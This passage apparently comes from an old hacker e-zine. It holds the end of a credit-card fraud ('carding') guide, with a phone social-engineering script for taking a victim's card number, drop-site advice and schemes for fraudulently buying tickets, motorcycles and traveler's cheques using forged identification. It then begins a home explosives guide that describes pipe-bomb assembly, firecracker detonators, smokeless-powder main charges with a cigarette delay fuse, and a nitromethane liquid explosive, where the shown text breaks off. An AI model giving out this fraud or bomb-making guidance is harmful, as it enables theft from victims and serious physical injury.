have had a computer breakdown and no more of your VISA transactions can be
|
|||
|
|
|||
|
processed since we lost your credit card number. Do you think that you can give
|
|||
|
|
|||
|
me your number again, so I can re-enter it right now?"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Mrs. Davis: "Wait a minute, who is this again?"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
YOU: "My name is Jack Off and I am from Citibank Security. (Explain whole
|
|||
|
|
|||
|
situation to her again )"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Mrs. Davis: "I don't know about this. Can I call you back at a number?"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
YOU: "Sure. That's no problem. I understand your reluctance. Here... call me at
|
|||
|
|
|||
|
my office. Its 555-1212 (pay phone, loop, or bridge which you are at)"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Mrs. Davis: "Ok, bye!"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<CLICK>
|
|||
|
|
|||
|
<RING...>
|
|||
|
|
|||
|
YOU: "Hello? This is Jack Off's office, Citibank Security, may I help you?"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Mrs. Davis: "Oh, good. I was afraid you were a phony. Ok, my VISA is xxxx-
|
|||
|
|
|||
|
xxx-xxx-xxx... "
|
|||
|
|
|||
|
|
|||
|
|
|||
|
YOU: "Thank you. We will try to restore your credit limit as soon as possible.
|
|||
|
|
|||
|
Until then, please refrain from trying to purchase merchandise on your Citibank
|
|||
|
|
|||
|
Visa Card. Goodbye."
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<CLICK>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Neat, huh?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FOURTH- If are a really advanced Carder, you can get fancy and use a credit
|
|||
|
|
|||
|
card formula. Great, you're saying to yourself. GIMME GIMME GIMME! Not so
|
|||
|
|
|||
|
quick. Although several do exist, and I do have a couple of them, I am in a
|
|||
|
|
|||
|
situation in which I am unable to reveal it. If you are particularly smart and
|
|||
|
|
|||
|
intelligent, you can develope it yourself. Actually, it is not that hard if you
|
|||
|
|
|||
|
have the means. MAYBE if you are good at math....
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIFTH- You may try to get credit cards from other people. (friends?) I
|
|||
|
|
|||
|
stronly recommend against this. Usually the cards you get from other people
|
|||
|
|
|||
|
have usually already been used and are either being watched or are already
|
|||
|
|
|||
|
dead.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SIXTH- If you have access to a Credit Union, you can call and "pull" someone
|
|||
|
|
|||
|
else's account. (For instance, if you know someone's name and address, or
|
|||
|
|
|||
|
social security, you can take a look at all of their loans and credit cards. )
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
IX. Advanced "Carding" Techniques
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Please, people, I beg of you -- If you have not been carding for a year or
|
|||
|
|
|||
|
two (AT LEAST) do not read this information. It will only confuse you, and even
|
|||
|
|
|||
|
if you understand it, it will not work as it should unless you have the
|
|||
|
|
|||
|
experience you are lacking. So sit tight and practice with parts I-VIII.
|
|||
|
|
|||
|
PLEASE!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If, perchance, you happen to have the experience necessary to read on,
|
|||
|
|
|||
|
then enjoy this. The following are simply a few details, hints, etc, that I
|
|||
|
|
|||
|
just left out of the original manuscript due to my horrendous memory. Add to it
|
|||
|
|
|||
|
if you like, and pass it a long. We all need to help each other if we are going
|
|||
|
|
|||
|
to survive. Also, the following are in no particular order except that which
|
|||
|
|
|||
|
they come to my head.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
1) For a drop site, you can try to get fancy if need be. I have heard of empty
|
|||
|
|
|||
|
military huts being used as well as empty condos, empty houses whose owners are
|
|||
|
|
|||
|
on vacation, and about a zillion other stories. If you think you have come
|
|||
|
|
|||
|
across something new, think a plan up, think it over, and think it over again.
|
|||
|
|
|||
|
Make sure you have every step down so when you order, pick up, and make your
|
|||
|
|
|||
|
escape, there are no problems. Think about it . . . what harm does it do to
|
|||
|
|
|||
|
spend an hour making sure you didn't overlook something. It is a lot better
|
|||
|
|
|||
|
than going there and getting caught.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
2) Sometimes the places you order from will have an online account with a
|
|||
|
|
|||
|
credit record bereau. (Such as TRW, CBI or Transunion) The horrifying fact is
|
|||
|
|
|||
|
that they can verify ONLINE ANY information that you give them. So, you're
|
|||
|
|
|||
|
busted, right? Wrong . . .
|
|||
|
|
|||
|
If this happens, there is nothing you can do unless you have a lot of power
|
|||
|
|
|||
|
with phones. Chances are, you don't. So play it cool and give an excuse to get
|
|||
|
|
|||
|
off the phone. Just try somewhere else. Also, if you don't do this right, you
|
|||
|
|
|||
|
will probably kill the credit card.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
X. Credit Unions
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Credit Unions basically are databases that hold information of its
|
|||
|
|
|||
|
members. When you apply for a credit card, I think that the application to be a
|
|||
|
|
|||
|
member of a Credit Union is presented also. Since almost EVERY person who owns
|
|||
|
|
|||
|
a credit card has personal information in at least one of these services, then
|
|||
|
|
|||
|
there is no fooling he who has access to these services. Many times in your
|
|||
|
|
|||
|
carding career, you will run into a bussiness who has an online connection to
|
|||
|
|
|||
|
such unions. If you try to present false information they will catch you and
|
|||
|
|
|||
|
follow up with the appropriate actions. (That is, report the credit card you
|
|||
|
|
|||
|
said is yours as dead, call the authorities, etc, etc.)
|
|||
|
|
|||
|
Two of the major Credit Bureaus in the United States are TRW and CBI. As
|
|||
|
|
|||
|
these two services hold large bases of information on its members (ie, every
|
|||
|
|
|||
|
credit card holder in America), many unauthorized personnel often wish to gain
|
|||
|
|
|||
|
access to them. They are accessed through a computer by calling a Bureau port
|
|||
|
|
|||
|
and entering authorization passwords.
|
|||
|
|
|||
|
For CBI, the passwords are in the format of nnnllnnn-**, where n=a number
|
|||
|
|
|||
|
0-9; where l=a letter from a-z; and where *=any character.
|
|||
|
|
|||
|
For TRW, the passwords are in the form of lllnnnnnnnlnl. (using the same
|
|||
|
|
|||
|
key as CBI.)
|
|||
|
|
|||
|
As you can see from the length and complexity of these passwords, it is
|
|||
|
|
|||
|
literally impossible to hack them. (ie, hack in the sense guess them.) So you
|
|||
|
|
|||
|
are probably wondering how unauthorized persons gain access, huh? Well, we
|
|||
|
|
|||
|
either have inside information or we go trashing. Thats it.
|
|||
|
|
|||
|
Right now, however, I am not going to go any further into the subject of
|
|||
|
|
|||
|
credit unions. Be aware that they exist, and they can help you as well as hurt
|
|||
|
|
|||
|
you if you don't know what you are doing. At a later date I plan on devoting an
|
|||
|
|
|||
|
entire file to the subject of credit unions, as I haven't seen an up-to-date
|
|||
|
|
|||
|
file in years.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Thats about all. I wish you all good luck, and may your adventures be safe and
|
|||
|
|
|||
|
fun-filled. And if I EVER catch any of you giving out the credit formula (once
|
|||
|
|
|||
|
you discover it..) I am going to personally fly over and kick your ass.
|
|||
|
|
|||
|
(remember- I have carded tickets around the country many times. There is
|
|||
|
|
|||
|
nothing to stop me from visiting YOUR town.. hahaha)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
One final note -- VISA is planning on changing their credit formula within a
|
|||
|
|
|||
|
few years. So if you happen to be reading this many a year down the line, you
|
|||
|
|
|||
|
will most likely discover that some of this is no longer valid. DONT BLAME ME.
|
|||
|
|
|||
|
It was valid at the time when I compiled it.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
APPENDIX A
|
|||
|
|
|||
|
----------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Credit Card Formats
|
|||
|
|
|||
|
-------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
American Express -- xxxx xxxxxx xxxxx
|
|||
|
|
|||
|
\/ \/ \/
|
|||
|
|
|||
|
/ | \
|
|||
|
|
|||
|
/ | \
|
|||
|
|
|||
|
4 digits 6 digits 5 digits
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VISA -- xxxx xxxx xxxx xxxx
|
|||
|
|
|||
|
\_________________/
|
|||
|
|
|||
|
4 digits each group
|
|||
|
|
|||
|
|
|||
|
|
|||
|
OR
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-- xxxx xxx xxx xxx
|
|||
|
|
|||
|
\/ \_________/
|
|||
|
|
|||
|
/ 3 digits each
|
|||
|
|
|||
|
4 digits
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Mastercard -- xxxx xxxx xxxx xxxx
|
|||
|
|
|||
|
\_________________/
|
|||
|
|
|||
|
4 digits each group
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Discover -- xxxx xxxx xxxx xxxx
|
|||
|
|
|||
|
\_________________/
|
|||
|
|
|||
|
4 digits each group.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
APPENDIX B
|
|||
|
|
|||
|
----------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Credit Verifiers
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
1800-554-2265. Use '#' (pound) as control key.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Card Type: 10 = Mastercard
|
|||
|
|
|||
|
20 = Visa
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Bank Identification: 1067
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Merchant Number(s): 1411
|
|||
|
|
|||
|
52
|
|||
|
|
|||
|
|
|||
|
|
|||
|
IDEA:: You all know those sex lines (like 800-666-LUST), well they verify your
|
|||
|
|
|||
|
credit card before they let you listen. You might try calling one of these and
|
|||
|
|
|||
|
using it for a while if you have nothing else.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
APPENDIX C
|
|||
|
|
|||
|
----------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Other Things to Do
|
|||
|
|
|||
|
|
|||
|
|
|||
|
1] Plane Tickets
|
|||
|
|
|||
|
|
|||
|
|
|||
|
It is relatively easy to order plane tickets using a credit card nowadays.
|
|||
|
|
|||
|
And, for convenience, you can order over the phone. Well, look up your favorite
|
|||
|
|
|||
|
airline, call them, and present them with the situation. You would like 2
|
|||
|
|
|||
|
executive class tickets to Florida [ Ed. Note - If you live in Florida, make it
|
|||
|
|
|||
|
a trip to California ] round trip to be billed to your Visa Credit Card. Oh
|
|||
|
|
|||
|
sure, maam. My credit card number is <blank>. My expiration date is <blank>. My
|
|||
|
|
|||
|
Name is Joe Schmoe. I live at 223 Hard On Lane, Pubic Hair, PA. Oh, and maam,
|
|||
|
|
|||
|
could you PLEEAZE hold the tickets at the airport for me. I will present some
|
|||
|
|
|||
|
identification to pick them up there. Thank you.
|
|||
|
|
|||
|
It is relatively easy to do this. But, there are a few catches.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
A.) Do NOT stay for any long period of time at any one place. After
|
|||
|
|
|||
|
few days, the airline will catch on to what you have done. My
|
|||
|
|
|||
|
suggestion is that you stay for only about 2 to 3 days. Or, if
|
|||
|
|
|||
|
you really want to stay for a long time, get a one way ticket to
|
|||
|
|
|||
|
wherever it is that you would like to go to. Stay however long
|
|||
|
|
|||
|
you want to stay and take another 1 way ticket home.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
B.) If you plan on traveling around the country, catch one way
|
|||
|
|
|||
|
tickets around from place to place. And please, USE DIFFERENT
|
|||
|
|
|||
|
AIRLINES!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
2] Motorcycles
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Again, you would be surprised at the amount of work (or lack of it)
|
|||
|
|
|||
|
required to aquire motorcycles on other people's credit cards. I believe you
|
|||
|
|
|||
|
can all see the advantages, so let us get down to the procedure. First, set up
|
|||
|
|
|||
|
an order under a corporate account. You can find these sometimes if you work in
|
|||
|
|
|||
|
a store that would use such cards. (Look over shoulders) Well, I will leave to
|
|||
|
|
|||
|
you the methods to come upon corporate account cards. Once you have them,
|
|||
|
|
|||
|
finish the procedure. Step 2 is to send an "employee" (yourself or a stupid
|
|||
|
|
|||
|
friend) to pick it up. Bring proper identification that was issued from the
|
|||
|
|
|||
|
corporation. (I suggest making your own -- Not very hard). Offer a Voice Mail
|
|||
|
|
|||
|
Box as your bussiness number. It is very common for a high level employee to be
|
|||
|
|
|||
|
absent from his desk. Use your imagination for the rest, and tidy it up to
|
|||
|
|
|||
|
perfect it.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
3] Travelers Cheques
|
|||
|
|
|||
|
|
|||
|
|
|||
|
OKAY, I will admit this is getting out of hand, but what the hell -- For
|
|||
|
|
|||
|
those of you very daring and in possession of a very good form of false
|
|||
|
|
|||
|
identification (Birth Certificate?), you can easily order some American Express
|
|||
|
|
|||
|
Traveler's Cheques for your travels around the world. The number to call is
|
|||
|
|
|||
|
1-800-777-7337. Using your American Express Credit Card, order some of these
|
|||
|
|
|||
|
"babies" in another name. (For a gift..) Have them delivered as you deem
|
|||
|
|
|||
|
appropriate. Enjoy them thouroughly.
|
|||
|
|
|||
|
[ Ed. Note: This number is active as of 12-20-88. I don't know if these offer
|
|||
|
|
|||
|
this service year round. Find out! ]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 5 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Introduction to Home Explosive Manufacture
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Written by:
|
|||
|
|
|||
|
Franz Liszt
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I do not assume any responsibility in
|
|||
|
|
|||
|
how this information is used; legally or illegally
|
|||
|
|
|||
|
and I do not recommend that one manufacture
|
|||
|
|
|||
|
explosives without a B.A.T.F. licence.
|
|||
|
|
|||
|
Do not worry about possessing this information
|
|||
|
|
|||
|
because the F.O.I.A. allows you to have any
|
|||
|
|
|||
|
information such as this, so as long as it is not
|
|||
|
|
|||
|
classified data.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I know of all of you phreaks, hackers, etc. out there are interested
|
|||
|
|
|||
|
in any kind of information that the public usually does not publicize.
|
|||
|
|
|||
|
This is why I have wrote this phile - to inform you. I also feel that
|
|||
|
|
|||
|
I should volunteer this information to PHUN because I have obtained
|
|||
|
|
|||
|
much useful information from that publication and others. I think that
|
|||
|
|
|||
|
anyone with good knowledge should teach it to their phriends because
|
|||
|
|
|||
|
we are becoming a dumb race due to the enlightened attitude of the
|
|||
|
|
|||
|
population from influences such as yuppies, geeks, skateboard freaks,
|
|||
|
|
|||
|
subliminal brainwashing, bloated bureaucrats, and lazy legislatures.
|
|||
|
|
|||
|
We must try to become free THINKING people so our brains do not atrophy.
|
|||
|
|
|||
|
Don't let any of the above influences brainwash you into a quivering
|
|||
|
|
|||
|
pathetic mass of gelatin like so many people are now. Use any
|
|||
|
|
|||
|
information from philes you read to benefit you and rid of the
|
|||
|
|
|||
|
bastards out to get you!!!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
At any rate, lets get on with it...The field of explosives is a very
|
|||
|
|
|||
|
interesting one to study. It can be fun, and it can be dangerous at
|
|||
|
|
|||
|
the same time. One must exercise great caution when assembling any
|
|||
|
|
|||
|
type of explosive device since most are sensitive to jarring, rough
|
|||
|
|
|||
|
handling, friction, static, and other influences. THIS INCLUDES
|
|||
|
|
|||
|
MIXING ANY CHEMICALS OR EXPLOSIVES TOGETHER.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DO NOT EVER MIX ANY EXPLOSIVE FORMULA TOGETHER WITH
|
|||
|
|
|||
|
ANOTHER UNLESS YOU WANT YOUR BODY EVAPORATED OR AT THE
|
|||
|
|
|||
|
LEAST, LIMBS REMOVED OR EYES BLINDED.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If you are uncertain of an explosive formula you have found in an
|
|||
|
|
|||
|
anarchist book or on some BBS, don't make it. As a matter of fact,
|
|||
|
|
|||
|
don't trust to many philes you see and only believe the reputable
|
|||
|
|
|||
|
books such as "The Poor Man's James Bond I & II", the "CIA Black
|
|||
|
|
|||
|
Books", and army field manuals. I also ran across some new books
|
|||
|
|
|||
|
called "Kitchen Improvised Explosives", which can be had from a
|
|||
|
|
|||
|
radical book company called LOOMPANICS UNLIMITED P.O. Box 1197, Port
|
|||
|
|
|||
|
Townsend, WA 98368. They are also a very good source for information
|
|||
|
|
|||
|
but the procedures outlined require more lab apparatus.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
It is also a good idea to take some chemistry classes. Take advantage
|
|||
|
|
|||
|
of chemistry in high school if you are still there. You can learn a lot
|
|||
|
|
|||
|
if you pay attention and read ahead of your teacher. Try to get on his
|
|||
|
|
|||
|
good side so he will let you perform "extracurricular activities" in
|
|||
|
|
|||
|
the school lab. You can learn a lot by doing experiments and you can
|
|||
|
|
|||
|
also have access to chemicals and expensive lab ware which I find is
|
|||
|
|
|||
|
necessary to safely make many explosive compounds. If you are out of
|
|||
|
|
|||
|
school, and you want to get serious about explosives, take a chemistry
|
|||
|
|
|||
|
class or two at your local college. Call your local Technical school
|
|||
|
|
|||
|
if you have one and ask them if they are offering any miners blasting
|
|||
|
|
|||
|
seminars in the future (yes these do exist). If not, call your local
|
|||
|
|
|||
|
bureau of mines and inquire. Some "social engineering" may be
|
|||
|
|
|||
|
necessary when talking to them though.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
One should at least go to the local library and look for explosive
|
|||
|
|
|||
|
books and check the encyclopedias for "scratch the surface"
|
|||
|
|
|||
|
information. If you know a little about chemistry, get the book "The
|
|||
|
|
|||
|
Chemistry of Powder and Explosives" by Tenny L. Davis. You can obtain
|
|||
|
|
|||
|
journal footnotes from such books and do further research in "Chemical
|
|||
|
|
|||
|
Abstracts" and "The Journal of the American Chemical Society" along
|
|||
|
|
|||
|
with many others; all obtainable from a halfway decent college
|
|||
|
|
|||
|
library in the reference section.
|
|||
|
|
|||
|
__________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
EXPLOSIVE TYPES
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Basically, there are two types - low and high. The low explosives are
|
|||
|
|
|||
|
chemical compounds such as black powder, flash powder, match head
|
|||
|
|
|||
|
powder, etc. These compounds do not necessarily explode but have more
|
|||
|
|
|||
|
of a burning characteristic. They will propagate into an explosion
|
|||
|
|
|||
|
when confined in a solid container such as a "pipe-bomb" so the gases
|
|||
|
|
|||
|
they produce can expand forcefully instead of burning away in the open
|
|||
|
|
|||
|
air. Black powder for instance detonates at about 300 meters per
|
|||
|
|
|||
|
second, which roughly means if you make a "train" or line of it 300
|
|||
|
|
|||
|
meters long, and detonate it with a blasting cap at one end of the
|
|||
|
|
|||
|
train, the chain reaction and decomposition of the whole train will
|
|||
|
|
|||
|
take one second. And black powder releases about 12000 PSI when confined
|
|||
|
|
|||
|
in nominal 2" water pipe with a wall thickness of 1/8" and detonated
|
|||
|
|
|||
|
with a No. 8 blasting cap (this is a standard size blasting cap that
|
|||
|
|
|||
|
coal miners and the military uses). Notice I said that it must be
|
|||
|
|
|||
|
detonated. You cannot just stick a wick in the pipe and light it because
|
|||
|
|
|||
|
more that likely it will only burn and make a big fire. I will talk more
|
|||
|
|
|||
|
about detonation later. 2,4,6-Trinitrotoluene (TNT) detonates at about
|
|||
|
|
|||
|
7400 meters per second when cast loaded into a container. TNT is a high
|
|||
|
|
|||
|
explosive and its subsequential confinement in a container is not as
|
|||
|
|
|||
|
important as with low explosives. High explosives are chemical compounds
|
|||
|
|
|||
|
that will explode regardless of containment. You could lay a big pile
|
|||
|
|
|||
|
of TNT on the ground, lay a blasting cap on top of it, light the wick,
|
|||
|
|
|||
|
and the whole mess will still explode. High explosives undergo a
|
|||
|
|
|||
|
chemical reaction of decomposition in less that a millionth of a second.
|
|||
|
|
|||
|
All of the energy is released instantaneously. Low explosives, such as
|
|||
|
|
|||
|
black powder have more of a burning characteristic. High explosives not
|
|||
|
|
|||
|
only detonate much quicker, but also release more energy. TNT releases
|
|||
|
|
|||
|
about 4.24 million PSI and the military explosive C-4 releases about 5.7
|
|||
|
|
|||
|
million PSI and detonates at 8100 meters per second!
|
|||
|
|
|||
|
_____________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DETONATION
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Most high explosives are not capable of detonating without being set off
|
|||
|
|
|||
|
or initiated with another explosion. This is done with the help of those
|
|||
|
|
|||
|
neat little goodies called blasting caps. They contain medium to high
|
|||
|
|
|||
|
explosives also, but their chemical composition(s) are unstable and will
|
|||
|
|
|||
|
detonate when fire or spark is introduced to them. You may ask then why
|
|||
|
|
|||
|
not just use blasting cap explosive instead of regular high explosives.
|
|||
|
|
|||
|
Well, blasting cap materials are VERY sensitive to shock, friction, etc.
|
|||
|
|
|||
|
and are also not as efficient as regular high explosives.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Anyway, the blasting cap is usually placed in the high explosive in a
|
|||
|
|
|||
|
well dug in the high explosive. An example would be like this in a pipe
|
|||
|
|
|||
|
bomb:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_______ Blasting cap
|
|||
|
|
|||
|
/
|
|||
|
|
|||
|
!-- * --!
|
|||
|
|
|||
|
! * !
|
|||
|
|
|||
|
! * !
|
|||
|
|
|||
|
! !_____ Pipe bomb
|
|||
|
|
|||
|
! !
|
|||
|
|
|||
|
! !
|
|||
|
|
|||
|
! !
|
|||
|
|
|||
|
! !
|
|||
|
|
|||
|
!-------!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
(please excuse the ASCII drawing)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When the cap is detonated, the explosive wave it generates is directed
|
|||
|
|
|||
|
downward and detonates the high explosive in a "chain reaction".
|
|||
|
|
|||
|
This is why the bottom of the explosive container should be placed on
|
|||
|
|
|||
|
the target. The peak of the propagated explosive wave will be at the
|
|||
|
|
|||
|
bottom of the explosive charge...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
At any rate, I do not suggest that one attempts to manufacture blasting
|
|||
|
|
|||
|
caps without knowledge in explosive handling safety and also the proper
|
|||
|
|
|||
|
laboratory procedures when making the blasting cap explosive itself.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I have made over 300 blasting caps without an accident. I also take very
|
|||
|
|
|||
|
careful precautions before assembling the caps and I have a properly
|
|||
|
|
|||
|
equipped laboratory to synthesize the explosive material. I always work
|
|||
|
|
|||
|
in a controlled environment with accurate measuring equipment for any
|
|||
|
|
|||
|
explosive experiment I partake in. It is necessary to work under a lab
|
|||
|
|
|||
|
fume hood to vent any toxic gases produced during experiments. It is also
|
|||
|
|
|||
|
a good idea to ground yourself and your work area so static electricity
|
|||
|
|
|||
|
doesn't wreak havoc and blow your chemical up in your face.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
IT IS GOSPEL TO FOLLOW DIRECTIONS WHEN DOING ANY EXPERIMENT. ESPECIALLY
|
|||
|
|
|||
|
WITH EXPLOSIVES. Outline your explosive production procedure before
|
|||
|
|
|||
|
proceeding with any experiment.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Refer to literature at your local library concerning blasting cap mfg.
|
|||
|
|
|||
|
before you attempt to make them. The book I mentioned "The Chemistry of
|
|||
|
|
|||
|
Powder and Explosives" covers the subject very well. There are also some
|
|||
|
|
|||
|
good books available from Paladin Press on explosive manufacture and the
|
|||
|
|
|||
|
blasting cap manufacture.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
It is possible to create blasting caps in a "kitchen" type environment,
|
|||
|
|
|||
|
but I do not recommend it because of the dangers involved when making
|
|||
|
|
|||
|
the explosive components. Many of the starting materials are corrosive
|
|||
|
|
|||
|
and toxic. Blasting cap explosives are also VERY sensitive. More so than
|
|||
|
|
|||
|
nitroglycerine in some cases. For instance, Lead azide, the most popular
|
|||
|
|
|||
|
blasting cap explosive today, when synthesized improperly, can grow into
|
|||
|
|
|||
|
crystals in the starting agent solution and spontaneously explode just
|
|||
|
|
|||
|
because of improper stirring and/or cooling. Very easy mistake to do.
|
|||
|
|
|||
|
Mercury fulminate, one of the cheapest and easiest to synthesize,
|
|||
|
|
|||
|
produces toxic gases when synthesizing. When the finished product is dry,
|
|||
|
|
|||
|
it is sensitive to a 2cm drop of a 5 lb. weight. THAT IS SENSITIVE!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ALTERNATIVE:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
After all of this negative talk of blasting caps leaves much to be
|
|||
|
|
|||
|
desired. But there is an alternative to using blasting caps if one has
|
|||
|
|
|||
|
access to firecrackers such as M-80's, M-100's, M-200's, cherry bombs,
|
|||
|
|
|||
|
Maroons, etc. These little bombs themselves are sufficient enough to
|
|||
|
|
|||
|
detonate many high explosives. All of the "nitro" compounds will
|
|||
|
|
|||
|
detonate with one of these firecrackers. Their use would be the same
|
|||
|
|
|||
|
as the blasting cap - inserted in a little "well" made in the explosive
|
|||
|
|
|||
|
charge, sealing off, and their fuse ignited accordingly.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
____________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MAIN EXPLOSIVE CHARGE
|
|||
|
|
|||
|
|
|||
|
|
|||
|
This is the big working explosive. The one that does the big damage.
|
|||
|
|
|||
|
It should be handled with the same precautions as blasting caps, but
|
|||
|
|
|||
|
in many cases, can be as safe as handling fertilizer.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Some examples of common high explosives are ditching dynamite, gelatin
|
|||
|
|
|||
|
dynamite, ANFO (ammonium nitrate fertilizer/fuel oil), TNT, PETN, RDX,
|
|||
|
|
|||
|
military plastics, and even smokeless powder.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
These explosives are easily made in some cases, and dangerous at the
|
|||
|
|
|||
|
same time. Since it is beyond the scope of this article, I must refer
|
|||
|
|
|||
|
everybody to your local library, the books I have mentioned, or most of
|
|||
|
|
|||
|
the "unusual" book publishers. Just do research in all possible material
|
|||
|
|
|||
|
before grabbing a book and running out, buying the chemicals, and
|
|||
|
|
|||
|
throwing stuff together. Get yourself a few of the "black-books", the
|
|||
|
|
|||
|
"Poor Man's James Bond volumes", etc. and compare them with each other.
|
|||
|
|
|||
|
Don't trust any unheard of publishers or books.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
It goes the same for the main charge; if one doesn't have access to the
|
|||
|
|
|||
|
necessary chemicals, one can improvise. For instance the smokeless
|
|||
|
|
|||
|
powders available from gunsmith's and reloading shops contain high-
|
|||
|
|
|||
|
explosives such as nitrocellulose and nitroglycerine. They are called
|
|||
|
|
|||
|
double based propellants. An example is made by Hercules Powder co.
|
|||
|
|
|||
|
called "Bullseye" pistol propellant. It contains:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
48% Nitroglycerine
|
|||
|
|
|||
|
50% Nitrocellulose
|
|||
|
|
|||
|
2% Flash suppressants, stabilizers, etc.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
It will detonate at about 7200 meters/sec. when firmly packed in 2 inch
|
|||
|
|
|||
|
wide, schedule 40 hardened steel pipe. It detonates with 2,000,000 PSI
|
|||
|
|
|||
|
also. This should suffice for many operations.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I myself placed 1 1/2 pounds of the powder in a three pound coffee can
|
|||
|
|
|||
|
and detonated it with an M-80 firecracker and it left a ditch in hard
|
|||
|
|
|||
|
packed clay-soil about 2 feet deep and 3 feet wide! It was simply placed
|
|||
|
|
|||
|
on the ground with the bottom of the can down. The blast was plainly
|
|||
|
|
|||
|
heard indoors 1 mile away! Please if you attempt such a blast, make sure
|
|||
|
|
|||
|
you give yourself ample time to get at least 300 yards away and don't
|
|||
|
|
|||
|
detonate it near any buildings within 50-75 yards because the air-blast
|
|||
|
|
|||
|
will possibly crack their windows. I usually use a lit cigarette placed
|
|||
|
|
|||
|
on the fuse of the cap or firecracker. This will give you about 10 min.
|
|||
|
|
|||
|
delay depending on the temperature and wind conditions. Packing the
|
|||
|
|
|||
|
cigarette will give a longer delay.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Another good explosive, if you prefer a liquid explosive is a mixture of
|
|||
|
|
|||
|
Nitromethane and amine based compounds such as aniline, ethylenediamine,
|
|||
|
|
|||
|
and for anyone that can't obtain the above chemicals, regular household
|
|||
|
|
|||
|
ammonia will work as long as it is the clear non-detergent brand.
|
|||
|
|
|||
|
The Nitromethane can be had from any "speed-shop" or race car parts
|
|||
|
|
|||
|
